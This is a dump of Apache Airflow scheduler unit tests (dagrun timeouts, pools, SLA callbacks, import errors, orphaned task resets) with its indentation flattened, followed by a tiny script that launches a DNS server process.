orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
def test_scheduler_fail_dagrun_timeout(self):
"""
Test if a a dagrun wil be set failed if timeout
"""
dag = DAG(
dag_id='test_scheduler_fail_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.dagrun_timeout = datetime.timedelta(seconds=60)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
dr2 = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr2)
dr.refresh_from_db(session=session)
self.assertEquals(dr.state, State.FAILED)
def test_scheduler_verify_max_active_runs_and_dagrun_timeout(self):
"""
Test if a a dagrun will not be scheduled if max_dag_runs
has been reached and dagrun_timeout is not reached
Test if a a dagrun will be scheduled if max_dag_runs has
been reached but dagrun_timeout is also reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs_and_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
dag.dagrun_timeout = datetime.timedelta(seconds=60)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
# Should not be scheduled as DagRun has not timedout and max_active_runs is reached
new_dr = scheduler.create_dag_run(dag)
self.assertIsNone(new_dr)
# Should be scheduled as dagrun_timeout has passed
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
new_dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(new_dr)
def test_scheduler_max_active_runs_respected_after_clear(self):
"""
Test if _process_task_instances only schedules ti's up to max_active_runs
(related to issue AIRFLOW-137)
"""
dag = DAG(
dag_id='test_scheduler_max_active_runs_respected_after_clear',
start_date=DEFAULT_DATE)
dag.max_active_runs = 3
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
# First create up to 3 dagruns in RUNNING state.
scheduler.create_dag_run(dag)
# Reduce max_active_runs to 1
dag.max_active_runs = 1
queue = Mock()
# and schedule them in, so we can check how many
# tasks are put on the queue (should be one, not 3)
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
)
@patch.object(TI, 'pool_full')
def test_scheduler_verify_pool_full(self, mock_pool_full):
"""
Test task instances not queued when pool is full
"""
mock_pool_full.return_value = False
dag = DAG(
dag_id='test_scheduler_verify_pool_full',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow',
pool='test_scheduler_verify_pool_full')
session = settings.Session()
pool = Pool(pool='test_scheduler_verify_pool_full', slots=1)
session.add(pool)
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
# Create 2 dagruns, which will create 2 task instances.
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEquals(dr.execution_date, DEFAULT_DATE)
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
queue = []
scheduler._process_task_instances(dag, queue=queue)
self.assertEquals(len(queue), 2)
dagbag = self._make_simple_dag_bag([dag])
# Recreated part of the scheduler here, to kick off tasks -> executor
for ti_key in queue:
task = dag.get_task(ti_key[1])
ti = TI(task, ti_key[2])
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
session.merge(ti)
session.commit()
scheduler._execute_task_instances(dagbag,
(State.SCHEDULED,
State.UP_FOR_RETRY))
self.assertEquals(len(scheduler.executor.queued_tasks), 1)
def test_scheduler_auto_align(self):
"""
Test if the schedule_interval will be auto aligned with the start_date
such that if the start_date coincides with the schedule the first
execution_date will be start_date, otherwise it will be start_date +
interval.
"""
dag = DAG(
dag_id='test_scheduler_auto_align_1',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="4 5 * * *"
)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEquals(dr.execution_date, timezone.datetime(2016, 1, 2, 5, 4))
dag = DAG(
dag_id='test_scheduler_auto_align_2',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="10 10 * * *"
)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEquals(dr.execution_date, timezone.datetime(2016, 1, 1, 10, 10))
def test_scheduler_reschedule(self):
"""
Checks if tasks that are not taken up by the executor
get rescheduled
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_scheduler_reschedule',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.orm.DagBag', return_value=dagbag)
@mock.patch('airflow.orm.DagBag.collect_dags')
def do_schedule(function, function2):
# Use a empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEquals(1, len(executor.queued_tasks))
executor.queued_tasks.clear()
do_schedule()
self.assertEquals(2, len(executor.queued_tasks))
def test_scheduler_sla_miss_callback(self):
"""
Test that the scheduler does not call the sla_miss_callback when a notification has already been sent
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
sla_callback = MagicMock()
# Create dag with a start of 2 days ago, but an sla of 1 day
# ago so we'll already have an sla_miss on the books
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow')
# Create a TaskInstance for two days ago
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(models.SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date,
email_sent=False,
notification_sent=True))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_not_called()
def test_scheduler_sla_miss_callback_exception(self):
"""
Test that the scheduler gracefully logs an exception if there is a problem
calling the sla_miss_callback
"""
session = settings.Session()
sla_callback = MagicMock(side_effect=RuntimeError('Could not call function'))
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='Success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(models.SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss')
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_called()
mock_log().exception.assert_called_with(
'Could not call sla_miss_callback for DAG %s',
'test_sla_miss')
@mock.patch("airflow.utils.email.send_email")
def test_scheduler_sla_miss_email_exception(self, mock_send_email):
"""
Test that the scheduler gracefully logs an exception if there is a problem
sending an email
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
mock_send_email.side_effect = RuntimeError('Could not send an email')
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
email='test@test.com',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='Success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(models.SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
mock_log().exception.assert_called_with(
'Could not send SLA Miss email notification for DAG %s',
'test_sla_miss')
def test_retry_still_in_executor(self):
"""
Checks if the scheduler does not put a task in limbo, when a task is retried
but is still present in the executor.
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_retry_still_in_executor',
start_date=DEFAULT_DATE,
schedule_interval="@once")
dag_task1 = BashOperator(
task_id='test_retry_handling_op',
bash_command='exit 1',
retries=1,
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.orm.DagBag', return_value=dagbag)
@mock.patch('airflow.orm.DagBag.collect_dags')
def do_schedule(function, function2):
# Use a empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEquals(1, len(executor.queued_tasks))
def run_with_error(task):
try:
task.run()
except AirflowException:
pass
ti_tuple = six.next(six.itervalues(executor.queued_tasks))
(command, priority, queue, simple_ti) = ti_tuple
ti = simple_ti.construct_task_instance()
ti.task = dag_task1
self.assertEqual(ti.try_number, 1)
# fail execution
run_with_error(ti)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
self.assertEqual(ti.try_number, 2)
ti.refresh_from_db(lock_for_update=True, session=session)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
# do not schedule
do_schedule()
self.assertTrue(executor.has_task(ti))
ti.refresh_from_db()
# removing self.assertEqual(ti.state, State.SCHEDULED)
# as scheduler will move state from SCHEDULED to QUEUED
# now the executor has cleared and it should be allowed the re-queue,
# but tasks stay in the executor.queued_tasks after executor.heartbeat()
# will be set back to SCHEDULED state
executor.queued_tasks.clear()
do_schedule()
ti.refresh_from_db()
self.assertEqual(ti.state, State.SCHEDULED)
# To verify that task does get re-queued.
executor.queued_tasks.clear()
executor.do_update = True
do_schedule()
ti.refresh_from_db()
self.assertEqual(ti.state, State.RUNNING)
@unittest.skipUnless("INTEGRATION" in os.environ, "Can only run end to end")
def test_retry_handling_job(self):
"""
Integration test of the scheduler not accidentally resetting
the try_numbers for a task
"""
dag = self.dagbag.get_dag('test_retry_handling_job')
dag_task1 = dag.get_task("test_retry_handling_op")
dag.clear()
scheduler = SchedulerJob(dag_id=dag.dag_id,
num_runs=1)
scheduler.heartrate = 0
scheduler.run()
session = settings.Session()
ti = session.query(TI).filter(TI.dag_id == dag.dag_id,
TI.task_id == dag_task1.task_id).first()
# make sure the counter has increased
self.assertEqual(ti.try_number, 2)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
def test_scheduler_run_duration(self):
"""
Verifies that the scheduler run duration limit is followed.
"""
dag_id = 'test_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertTrue(dag.start_date > DEFAULT_DATE)
expected_run_duration = 5
start_time = timezone.utcnow()
scheduler = SchedulerJob(dag_id,
run_duration=expected_run_duration)
scheduler.run()
end_time = timezone.utcnow()
run_duration = (end_time - start_time).total_seconds()
logging.info("Test ran in %.2fs, expected %.2fs",
run_duration,
expected_run_duration)
# 5s to wait for child process to exit, 1s dummy sleep
# in scheduler loop to prevent excessive logs and 1s for last loop to finish.
self.assertLess(run_duration - expected_run_duration, 6.0)
def test_dag_with_system_exit(self):
"""
Test to check that a DAG with a system.exit() doesn't break the scheduler.
"""
dag_id = 'exit_test_dag'
dag_ids = [dag_id]
dag_directory = os.path.join(settings.DAGS_FOLDER,
"..",
"dags_with_system_exit")
dag_file = os.path.join(dag_directory,
'b_test_scheduler_dags.py')
dagbag = DagBag(dag_folder=dag_file)
for dag_id in dag_ids:
dag = dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
subdir=dag_directory,
num_runs=1)
scheduler.run()
with create_session() as session:
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
def test_dag_get_active_runs(self):
"""
Test to check that a DAG returns its active runs
"""
now = timezone.utcnow()
six_hours_ago_to_the_hour = \
(now - datetime.timedelta(hours=6)).replace(minute=0, second=0, microsecond=0)
START_DATE = six_hours_ago_to_the_hour
DAG_NAME1 = 'get_active_runs_test'
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': START_DATE
}
dag1 = DAG(DAG_NAME1,
schedule_interval='* * * * *',
max_active_runs=1,
default_args=default_args
)
run_this_1 = DummyOperator(task_id='run_this_1', dag=dag1)
run_this_2 = DummyOperator(task_id='run_this_2', dag=dag1)
run_this_2.set_upstream(run_this_1)
run_this_3 = DummyOperator(task_id='run_this_3', dag=dag1)
run_this_3.set_upstream(run_this_2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag1.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag1.clear()
dr = scheduler.create_dag_run(dag1)
# We had better get a dag run
self.assertIsNotNone(dr)
execution_date = dr.execution_date
running_dates = dag1.get_active_runs()
try:
running_date = running_dates[0]
except Exception as _:
running_date = 'Except'
self.assertEqual(execution_date, running_date, 'Running Date must match Execution Date')
def test_dag_catchup_option(self):
"""
Test to check that a DAG with catchup = False only schedules beginning now, not back to the start date
"""
def setup_dag(dag_id, schedule_interval, start_date, catchup):
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': start_date
}
dag = DAG(dag_id,
schedule_interval=schedule_interval,
max_active_runs=1,
catchup=catchup,
default_args=default_args)
t1 = DummyOperator(task_id='t1', dag=dag)
t2 = DummyOperator(task_id='t2', dag=dag)
t2.set_upstream(t1)
t3 = DummyOperator(task_id='t3', dag=dag)
t3.set_upstream(t2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
return dag
now = timezone.utcnow()
six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(
minute=0, second=0, microsecond=0)
half_an_hour_ago = now - datetime.timedelta(minutes=30)
two_hours_ago = now - datetime.timedelta(hours=2)
scheduler = SchedulerJob()
dag1 = setup_dag(dag_id='dag_with_catchup',
schedule_interval='* * * * *',
start_date=six_hours_ago_to_the_hour,
catchup=True)
default_catchup = configuration.conf.getboolean('scheduler', 'catchup_by_default')
self.assertEqual(default_catchup, True)
self.assertEqual(dag1.catchup, True)
dag2 = setup_dag(dag_id='dag_without_catchup_ten_minute',
schedule_interval='*/10 * * * *',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag2)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last half an hour, not 6 hours ago
self.assertGreater(dr.execution_date, half_an_hour_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag3 = setup_dag(dag_id='dag_without_catchup_hourly',
schedule_interval='@hourly',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag3)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last 2 hours, not 6 hours ago
self.assertGreater(dr.execution_date, two_hours_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag4 = setup_dag(dag_id='dag_without_catchup_once',
schedule_interval='@once',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag4)
self.assertIsNotNone(dr)
def test_add_unparseable_file_before_sched_start_creates_import_error(self):
dags_folder = mkdtemp()
try:
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_add_unparseable_file_after_sched_start_creates_import_error(self):
dags_folder = mkdtemp()
try:
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_no_import_errors_with_parseable_dag(self):
try:
dags_folder = mkdtemp()
parseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(parseable_filename, 'w') as parseable_file:
parseable_file.writelines(PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_new_import_error_replaces_old(self):
try:
dags_folder = mkdtemp()
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Generate replacement import error (the error will be on the second line now)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(
PARSEABLE_DAG_FILE_CONTENTS +
os.linesep +
UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 2)".format(TEMP_DAG_FILENAME))
def test_remove_error_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Remove the import error from the file
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(
PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_remove_file_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
# Rerun the scheduler once the dag file has been removed
self.run_single_scheduler_loop_with_no_dags(dags_folder)
with create_session() as session:
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_list_py_file_paths(self):
"""
[JIRA-1357] Test the 'list_py_file_paths' function used by the
scheduler to list and load DAGs.
"""
detected_files = set()
expected_files = set()
# No_dags is empty, _invalid_ is ignored by .airflowignore
ignored_files = [
'no_dags.py',
'test_invalid_cron.py',
'test_zip_invalid_cron.zip',
]
for file_name in os.listdir(TEST_DAGS_FOLDER):
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ignored_files:
expected_files.add(
'{}/{}'.format(TEST_DAGS_FOLDER, file_name))
for file_path in list_py_file_paths(TEST_DAGS_FOLDER, include_examples=False):
detected_files.add(file_path)
self.assertEqual(detected_files, expected_files)
example_dag_folder = airflow.example_dags.__path__[0]
for root, dirs, files in os.walk(example_dag_folder):
for file_name in files:
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ['__init__.py']:
expected_files.add(os.path.join(root, file_name))
detected_files.clear()
for file_path in list_py_file_paths(TEST_DAGS_FOLDER, include_examples=True):
detected_files.add(file_path)
self.assertEqual(detected_files, expected_files)
def test_reset_orphaned_tasks_nothing(self):
"""Try with nothing. """
scheduler = SchedulerJob()
session = settings.Session()
self.assertEqual(
0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_external_triggered_dag(self):
dag_id = 'test_reset_orphaned_tasks_external_triggered_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
dr1.state = State.RUNNING
ti.state = State.SCHEDULED
dr1.external_trigger = True
session.merge(ti)
session.merge(dr1)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(session=session)
self.assertEquals(1, len(reset_tis))
def test_reset_orphaned_tasks_backfill_dag(self):
dag_id = 'test_reset_orphaned_tasks_backfill_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
ti.state = State.SCHEDULED
dr1.state = State.RUNNING
dr1.run_id = BackfillJob.ID_PREFIX + '_sdfsfdfsd'
session.merge(ti)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_specified_dagrun(self):
"""Try to reset when we specify a dagrun and ensure nothing else is."""
dag_id = 'test_reset_orphaned_tasks_specified_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
# make two dagruns, only reset for one
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
dr2.state = State.RUNNING
ti1 = dr1.get_task_instances(session=session)[0]
ti2 = dr2.get_task_instances(session=session)[0]
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(dr1)
session.merge(dr2)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr2, session=session)
self.assertEquals(1, len(reset_tis))
ti1.refresh_from_db(session=session)
ti2.refresh_from_db(session=session)
self.assertEquals(State.SCHEDULED, ti1.state)
self.assertEquals(State.NONE, ti2.state)
def test_reset_orphaned_tasks_nonexistent_dagrun(self):
"""Make sure a task in an orphaned state is not reset if it has no dagrun. """
dag_id = 'test_reset_orphaned_tasks_nonexistent_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
task = DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
session.add(ti)
session.commit()
ti.refresh_from_db()
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_no_orphans(self):
dag_id = 'test_reset_orphaned_tasks_no_orphans'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
tis = dr1.get_task_instances(session=session)
tis[0].state = State.RUNNING
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
tis[0].refresh_from_db()
self.assertEquals(State.RUNNING, tis[0].state)
def test_reset_orphaned_tasks_non_running_dagruns(self):
"""Ensure orphaned tasks with non-running dagruns are not reset."""
dag_id = 'test_reset_orphaned_tasks_non_running_dagruns'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
tis = dr1.get_task_instances(session=session)
self.assertEquals(1, len(tis))
tis[0].state = State.SCHEDULED
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_with_orphans(self):
"""Create dagruns and esnure only ones with correct states are reset."""
prefix = 'scheduler_job_test_test_reset_orphaned_tasks'
states = [State.QUEUED, State.SCHEDULED, State.NONE, State.RUNNING, State.SUCCESS]
states_to_reset = [State.QUEUED, State.SCHEDULED, State.NONE]
dag = DAG(dag_id=prefix,
start_date=DEFAULT_DATE,
schedule_interval="@daily")
tasks = []
for i in range(len(states)):
task_id = "{}_task_{}".format(prefix, i)
task = DummyOperator(task_id=task_id, dag=dag)
tasks.append(task)
scheduler = SchedulerJob()
session = settings.Session()
# create dagruns
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
dr2.state = State.SUCCESS
session.merge(dr1)
session.merge(dr2)
session.commit()
# create taskinstances and set states
dr1_tis = []
dr2_tis = []
for i, (task, state) in enumerate(zip(tasks, states)):
ti1 = TI(task, dr1.execution_date)
ti2 = TI(task, dr2.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = state
ti2.state = state
dr1_tis.append(ti1)
dr2_tis.append(ti2)
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(2, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
for ti in dr1_tis + dr2_tis:
ti.refresh_from_db()
# running dagrun should be reset
for state, ti in zip(states, dr1_tis):
if state in states_to_reset:
self.assertIsNone(ti.state)
else:
self.assertEqual(state, ti.state)
# otherwise not
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
for state, ti in zip(states, dr1_tis):
ti.state = state
session.commit()
scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr1, session=session)
# check same for dag_run version
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
session.close()
|
dns_test.py
|
from DnsServer import dns_server
from multiprocessing import Process
p_dns = Process(target=dns_server, args=())
p_dns.start()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.